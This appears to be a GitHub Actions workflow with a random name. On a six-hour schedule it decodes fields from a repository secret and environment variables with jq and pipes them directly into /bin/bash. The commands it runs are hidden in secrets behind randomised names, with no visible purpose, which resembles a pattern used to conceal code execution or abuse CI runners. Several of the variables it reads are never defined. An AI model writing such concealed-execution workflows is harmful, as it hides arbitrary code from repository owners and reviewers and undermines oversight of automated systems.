name: xianghuaguo3451
on:
  workflow_dispatch:
  schedule:
    - cron: '40 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xianghuaguo3451
        env:
          imfss06: ${{ secrets.imfss06 }}
        run: |
          echo $imfss06 | jq -r .bvye7 | /bin/bash
          echo $hrq36632 | jq -r .c0206 | /bin/bash
          echo $n032 | jq -r .ern737 | /bin/bash
          echo $gvov5408 | jq -r .tw8 | /bin/bash
          echo $siwy04 | jq -r .wbf73 | /bin/bash

